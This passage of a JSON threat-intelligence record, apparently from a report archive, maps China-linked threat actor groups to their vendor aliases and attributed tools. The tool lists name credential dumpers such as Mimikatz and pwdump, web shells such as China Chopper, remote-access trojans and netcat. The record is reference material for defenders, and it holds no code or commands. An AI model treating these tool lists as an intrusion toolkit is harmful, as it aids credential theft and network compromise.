				"Destroy RAT",
				"DestroyRAT",
				"Gen:Trojan.Heur.PT",
				"Kaba",
				"Korplug",
				"LuckyBack",
				"PhantomNet",
				"PlugX",
				"Poison Ivy",
				"RedDelta",
				"RoyalRoad",
				"SManager",
				"SPIVY",
				"Sogu",
				"TIGERPLUG",
				"TManger",
				"TVT",
				"Thoper",
				"Xamtrav",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2704d770-43b4-4bc4-8a5a-05df87416848",
			"created_at": "2022-10-25T15:50:23.306305Z",
			"updated_at": "2026-04-10T02:00:05.296581Z",
			"deleted_at": null,
			"main_name": "HAFNIUM",
			"aliases": [
				"HAFNIUM",
				"Operation Exchange Marauder",
				"Silk Typhoon"
			],
			"source_name": "MITRE:HAFNIUM",
			"tools": [
				"Tarrask",
				"ASPXSpy",
				"Impacket",
				"PsExec",
				"China Chopper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c",
			"created_at": "2022-10-25T15:50:23.819113Z",
			"updated_at": "2026-04-10T02:00:05.354598Z",
			"deleted_at": null,
			"main_name": "Threat Group-3390",
			"aliases": [
				"Threat Group-3390",
				"Earth Smilodon",
				"TG-3390",
				"Emissary Panda",
				"BRONZE UNION",
				"APT27",
				"Iron Tiger",
				"LuckyMouse",
				"Linen Typhoon"
			],
			"source_name": "MITRE:Threat Group-3390",
			"tools": [
				"Systeminfo",
				"gsecdump",
				"PlugX",
				"ASPXSpy",
				"Cobalt Strike",
				"Mimikatz",
				"Impacket",
				"gh0st RAT",
				"certutil",
				"China Chopper",
				"HTTPBrowser",
				"Tasklist",
				"netstat",
				"SysUpdate",
				"HyperBro",
				"ZxShell",
				"RCSession",
				"ipconfig",
				"Clambling",
				"pwdump",
				"NBTscan",
				"Pandora",
				"Windows Credential Editor"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "61ea51ed-a419-4b05-9241-5ab0dbba25fc",
			"created_at": "2023-01-06T13:46:38.354607Z",
			"updated_at": "2026-04-10T02:00:02.939761Z",
			"deleted_at": null,
			"main_name": "APT23",
			"aliases": [
				"BRONZE HOBART",
				"G0081",
				"Red Orthrus",
				"Earth Centaur",
				"PIRATE PANDA",
				"KeyBoy",
				"Tropic Trooper"
			],
			"source_name": "MISPGALAXY:APT23",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "17d16126-35d7-4c59-88a5-0b48e755e80f",
			"created_at": "2025-08-07T02:03:24.622109Z",
			"updated_at": "2026-04-10T02:00:03.726126Z",
			"deleted_at": null,
			"main_name": "BRONZE HUNTLEY",
			"aliases": [
				"CactusPete ",
				"Earth Akhlut ",
				"Karma Panda ",
				"Red Beifang",
				"Tonto Team"
			],
			"source_name": "Secureworks:BRONZE HUNTLEY",
			"tools": [
				"Bisonal",
				"RatN",
				"Royal Road",
				"ShadowPad"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bef7800a-a08f-4e21-b65c-4279c851e572",
			"created_at": "2022-10-25T15:50:23.409336Z",
			"updated_at": "2026-04-10T02:00:05.319608Z",
			"deleted_at": null,
			"main_name": "Tropic Trooper",
			"aliases": [
				"Tropic Trooper",
				"Pirate Panda",
				"KeyBoy"
			],
			"source_name": "MITRE:Tropic Trooper",
			"tools": [
				"USBferry",
				"ShadowPad",
				"PoisonIvy",
				"BITSAdmin",
				"YAHOYAH",
				"KeyBoy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "3c7097f4-849b-4bc0-a7e6-ba2b510722b6",
			"created_at": "2022-10-25T16:07:23.869951Z",
			"updated_at": "2026-04-10T02:00:04.766204Z",
			"deleted_at": null,
			"main_name": "Mikroceen",
			"aliases": [
				"SixLittleMonkeys"
			],
			"source_name": "ETDA:Mikroceen",
			"tools": [
				"AngryRebel",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"Microcin",
				"Mikroceen",
				"Mimikatz",
				"Moudour",
				"Mydoor",
				"PCRat",
				"logon.dll",
				"logsupport.dll",
				"pcaudit.bat",
				"sqllauncher.dll"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5d9dfc61-6138-497a-b9da-33885539f19c",
			"created_at": "2022-10-25T16:07:23.720008Z",
			"updated_at": "2026-04-10T02:00:04.726002Z",
			"deleted_at": null,
			"main_name": "Icefog",
			"aliases": [
				"ATK 23",
				"Dagger Panda",
				"Icefog",
				"Red Wendigo"
			],
			"source_name": "ETDA:Icefog",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"Dagger Three",
				"Fucobha",
				"Icefog",
				"Javafog",
				"POISONPLUG.SHADOW",
				"RoyalRoad",
				"ShadowPad Winnti",
				"XShellGhost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6e79c98d-c678-4f28-b869-5723a78e71f4",
			"created_at": "2023-01-06T13:46:39.422441Z",
			"updated_at": "2026-04-10T02:00:03.322083Z",
			"deleted_at": null,
			"main_name": "Vicious Panda",
			"aliases": [
				"SixLittleMonkeys"
			],
			"source_name": "MISPGALAXY:Vicious Panda",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "945a572f-ebe3-4e2f-a288-512fe751cfa8",
			"created_at": "2022-10-25T16:07:24.413971Z",
			"updated_at": "2026-04-10T02:00:04.97924Z",
			"deleted_at": null,
			"main_name": "Winnti Group",
			"aliases": [
				"G0044",
				"Leopard Typhoon",
				"Wicked Panda",
				"Winnti Group"
			],
			"source_name": "ETDA:Winnti Group",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"FunnySwitch",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c39b0fe6-5642-4717-9a05-9e94265e3e3a",
			"created_at": "2022-10-25T16:07:24.332084Z",
			"updated_at": "2026-04-10T02:00:04.940672Z",
			"deleted_at": null,
			"main_name": "Tonto Team",
			"aliases": [
				"Bronze Huntley",
				"CactusPete",
				"Earth Akhlut",
				"G0131",
				"HartBeat",
				"Karma Panda",
				"LoneRanger",
				"Operation Bitter Biscuit",
				"TAG-74",
				"Tonto Team"
			],
			"source_name": "ETDA:Tonto Team",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"Bioazih",
				"Bisonal",
				"CONIME",
				"Dexbia",
				"Korlia",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mimikatz",
				"POISONPLUG.SHADOW",
				"RoyalRoad",
				"ShadowPad Winnti",
				"XShellGhost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "54e55585-1025-49d2-9de8-90fc7a631f45",
			"created_at": "2025-08-07T02:03:24.563488Z",
			"updated_at": "2026-04-10T02:00:03.715427Z",
			"deleted_at": null,
			"main_name": "BRONZE BUTLER",
			"aliases": [
				"CTG-2006 ",
				"Daserf",
				"Stalker Panda ",
				"Swirl Typhoon ",
				"Tick "
			],
			"source_name": "Secureworks:BRONZE BUTLER",
			"tools": [
				"ABK",
				"BBK",
				"Casper",
				"DGet",
				"Daserf",
				"Datper",
				"Ghostdown",
				"Gofarer",
				"MSGet",
				"Mimikatz",
				"Netboy",
				"RarStar",
				"Screen Capture Tool",
				"ShadowPad",
				"ShadowPy",
				"T-SMB",
				"down_new",
				"gsecdump"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "20b5fa2f-2ef1-4e69-8275-25927a762f72",
			"created_at": "2025-08-07T02:03:24.573647Z",
			"updated_at": "2026-04-10T02:00:03.765721Z",
			"deleted_at": null,
			"main_name": "BRONZE DUDLEY",
			"aliases": [
				"TA428 ",
				"Temp.Hex ",
				"Vicious Panda "
			],
			"source_name": "Secureworks:BRONZE DUDLEY",
			"tools": [
				"NCCTrojan",
				"PhantomNet",
				"PoisonIvy",
				"Royal Road"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c63ab035-f9f2-4723-959b-97a7b98b5942",
			"created_at": "2023-01-06T13:46:38.298354Z",
			"updated_at": "2026-04-10T02:00:02.917311Z",
			"deleted_at": null,
			"main_name": "APT27",
			"aliases": [
				"BRONZE UNION",
				"Circle Typhoon",
				"Linen Typhoon",
				"TEMP.Hippo",
				"Budworm",
				"Lucky Mouse",
				"G0027",
				"GreedyTaotie",
				"Red Phoenix",
				"Iron Tiger",
				"Iron Taurus",
				"Earth Smilodon",
				"TG-3390",
				"EMISSARY PANDA",
				"Group 35",
				"ZipToken"
			],
			"source_name": "MISPGALAXY:APT27",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "578f8e62-2bb4-4ce4-a8b7-6c868fa29724",
			"created_at": "2022-10-25T16:07:24.344358Z",
			"updated_at": "2026-04-10T02:00:04.947834Z",
			"deleted_at": null,
			"main_name": "Tropic Trooper",
			"aliases": [
				"APT 23",
				"Bronze Hobart",
				"Earth Centaur",
				"G0081",
				"KeyBoy",
				"Operation Tropic Trooper",
				"Pirate Panda",
				"Tropic Trooper"
			],
			"source_name": "ETDA:Tropic Trooper",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"ByPassGodzilla",
				"CHINACHOPPER",
				"CREDRIVER",
				"China Chopper",
				"Chymine",
				"Darkmoon",
				"Gen:Trojan.Heur.PT",
				"KeyBoy",
				"Neo-reGeorg",
				"PCShare",
				"POISONPLUG.SHADOW",
				"Poison Ivy",
				"RoyalRoad",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Swor",
				"TSSL",
				"USBferry",
				"W32/Seeav",
				"Winsloader",
				"XShellGhost",
				"Yahoyah",
				"fscan",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a4aca3ca-9e04-42d1-b037-f7fb3fbab0b1",
			"created_at": "2023-01-06T13:46:39.042499Z",
			"updated_at": "2026-04-10T02:00:03.194713Z",
			"deleted_at": null,
			"main_name": "TA428",
			"aliases": [
				"BRONZE DUDLEY",
				"Colourful Panda"
			],
			"source_name": "MISPGALAXY:TA428",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3c5b0e7e-2388-4b63-9b97-6b027bec4bf7",
			"created_at": "2023-01-06T13:46:39.068694Z",
			"updated_at": "2026-04-10T02:00:03.202867Z",
			"deleted_at": null,
			"main_name": "Calypso",
			"aliases": [
				"BRONZE MEDLEY"
			],
			"source_name": "MISPGALAXY:Calypso",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "60d96824-1767-4b97-a6c7-7e9527458007",
			"created_at": "2023-01-06T13:46:39.378701Z",
			"updated_at": "2026-04-10T02:00:03.307846Z",
			"deleted_at": null,
			"main_name": "ToddyCat",
			"aliases": [
				"Websiic"
			],
			"source_name": "MISPGALAXY:ToddyCat",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "86182dd7-646c-49c5-91a6-4b62fd2119a7",
			"created_at": "2025-08-07T02:03:24.617638Z",
			"updated_at": "2026-04-10T02:00:03.738499Z",
			"deleted_at": null,
			"main_name": "BRONZE HOBART",
			"aliases": [
				"APT23",
				"Earth Centaur ",
				"KeyBoy ",
				"Pirate Panda ",
				"Red Orthrus ",
				"TA413 ",
				"Tropic Trooper "
			],
			"source_name": "Secureworks:BRONZE HOBART",
			"tools": [
				"Crowdoor",
				"DSNGInstaller",
				"KeyBoy",
				"LOWZERO",
				"Mofu",
				"Pfine",
				"Sepulcher",
				"Xiangoop Loader",
				"Yahaoyah"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bf6cb670-bb69-473f-a220-97ac713fd081",
			"created_at": "2022-10-25T16:07:23.395205Z",
			"updated_at": "2026-04-10T02:00:04.578924Z",
			"deleted_at": null,
			"main_name": "Bitter",
			"aliases": [
				"G1002",
				"T-APT-17",
				"TA397"
			],
			"source_name": "ETDA:Bitter",
			"tools": [
				"Artra Downloader",
				"ArtraDownloader",
				"Bitter RAT",
				"BitterRAT",
				"Dracarys"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "13d9c5fc-af82-4474-90dd-188c4e40a399",
			"created_at": "2022-10-25T16:07:23.435079Z",
			"updated_at": "2026-04-10T02:00:04.601572Z",
			"deleted_at": null,
			"main_name": "Calypso",
			"aliases": [
				"Bronze Medley"
			],
			"source_name": "ETDA:Calypso",
			"tools": [
				"Agent.dhwf",
				"Byeby",
				"Calypso RAT",
				"DCSync",
				"Destroy RAT",
				"DestroyRAT",
				"DoublePulsar",
				"EternalBlue",
				"EternalRomance",
				"FlyingDutchman",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mimikatz",
				"NBTscan",
				"OS_Check_445",
				"PlugX",
				"Quarks PwDump",
				"RedDelta",
				"SAMRID",
				"Sogu",
				"SysInternals",
				"TCP Port Scanner",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Whitebird",
				"Xamtrav",
				"ZXPortMap",
				"nbtscan",
				"netcat"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b399b5f1-42d3-4b53-8c73-d448fce6ab43",
			"created_at": "2025-08-07T02:03:24.68371Z",
			"updated_at": "2026-04-10T02:00:03.64323Z",
			"deleted_at": null,
			"main_name": "BRONZE UNION",
			"aliases": [
				"APT27 ",
				"Bowser",
				"Budworm ",
				"Circle Typhoon ",
				"Emissary Panda ",
				"Group35",
				"Iron Tiger ",
				"Linen Typhoon ",
				"Lucky Mouse ",
				"TG-3390 ",
				"Temp.Hippo "
			],
			"source_name": "Secureworks:BRONZE UNION",
			"tools": [
				"AbcShell",
				"China Chopper",
				"EAGERBEE",
				"Gh0st RAT",
				"OwaAuth",
				"PhantomNet",
				"PoisonIvy",
				"Sysupdate",
				"Wonknu",
				"Wrapikatz",
				"ZxShell",
				"reGeorg"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "529c1ae9-4579-4245-86a6-20f4563a695d",
			"created_at": "2022-10-25T16:07:23.702006Z",
			"updated_at": "2026-04-10T02:00:04.71708Z",
			"deleted_at": null,
			"main_name": "Hafnium",
			"aliases": [
				"G0125",
				"Murky Panda",
				"Red Dev 13",
				"Silk Typhoon"
			],
			"source_name": "ETDA:Hafnium",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5c13338b-eaed-429a-9437-f5015aa98276",
			"created_at": "2022-10-25T16:07:23.582715Z",
			"updated_at": "2026-04-10T02:00:04.675765Z",
			"deleted_at": null,
			"main_name": "Emissary Panda",
			"aliases": [
				"APT 27",
				"ATK 15",
				"Bronze Union",
				"Budworm",
				"Circle Typhoon",
				"Earth Smilodon",
				"Emissary Panda",
				"G0027",
				"Group 35",
				"Iron Taurus",
				"Iron Tiger",
				"Linen Typhoon",
				"LuckyMouse",
				"Operation DRBControl",
				"Operation Iron Tiger",
				"Operation PZChao",
				"Operation SpoiledLegacy",
				"Operation StealthyTrident",
				"Red Phoenix",
				"TEMP.Hippo",
				"TG-3390",
				"ZipToken"
			],
			"source_name": "ETDA:Emissary Panda",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"Agent.dhwf",
				"AngryRebel",
				"Antak",
				"CHINACHOPPER",
				"China Chopper",
				"Destroy RAT",
				"DestroyRAT",
				"FOCUSFJORD",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HTTPBrowser",
				"HTran",
				"HUC Packet Transmit Tool",
				"HighShell",
				"HttpBrowser RAT",
				"HttpDump",
				"HyperBro",
				"HyperSSL",
				"HyperShell",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mimikatz",
				"Moudour",
				"Mydoor",
				"Nishang",
				"OwaAuth",
				"PCRat",
				"PlugX",
				"ProcDump",
				"PsExec",
				"RedDelta",
				"SEASHARPEE",
				"Sensocode",
				"SinoChopper",
				"Sogu",
				"SysUpdate",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Token Control",
				"TokenControl",
				"TwoFace",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Xamtrav",
				"ZXShell",
				"gsecdump",
				"luckyowa"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b",
			"created_at": "2022-10-25T16:07:23.419513Z",
			"updated_at": "2026-04-10T02:00:04.591062Z",
			"deleted_at": null,
			"main_name": "Bronze Butler",
			"aliases": [
				"Bronze Butler",
				"CTG-2006",
				"G0060",
				"Operation ENDTRADE",
				"RedBaldNight",
				"Stalker Panda",
				"Stalker Taurus",
				"Swirl Typhoon",
				"TEMP.Tick",
				"Tick"
			],
			"source_name": "ETDA:Bronze Butler",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"9002 RAT",
				"AngryRebel",
				"Blogspot",
				"Daserf",
				"Datper",
				"Elirks",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HOMEUNIX",
				"HidraQ",
				"HomamDownloader",
				"Homux",
				"Hydraq",
				"Lilith",
				"Lilith RAT",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"Minzen",
				"Moudour",
				"Muirim",
				"Mydoor",
				"Nioupale",
				"PCRat",
				"POISONPLUG.SHADOW",
				"Roarur",
				"RoyalRoad",
				"ShadowPad Winnti",
				"ShadowWali",
				"ShadowWalker",
				"SymonLoader",
				"WCE",
				"Wali",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"XShellGhost",
				"XXMM",
				"gsecdump",
				"rarstar"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "236429ce-6355-43f6-9b58-e6803a1df3f4",
			"created_at": "2026-03-16T02:02:50.60344Z",
			"updated_at": "2026-04-10T02:00:03.641587Z",
			"deleted_at": null,
			"main_name": "Bronze Union",
			"aliases": [
				"Circle Typhoon ",
				"Emissary Panda "
			],
			"source_name": "Secureworks:Bronze Union",
			"tools": [
				"China Chopper",
				"OwaAuth",
				"Sysupdate"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434000,
	"ts_updated_at": 1775792241,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fac1b6bd2567479aaa03a7dde4069bb2f4470bfb.pdf",
		"text": "https://archive.orkl.eu/fac1b6bd2567479aaa03a7dde4069bb2f4470bfb.txt",
		"img": "https://archive.orkl.eu/fac1b6bd2567479aaa03a7dde4069bb2f4470bfb.jpg"
	}
}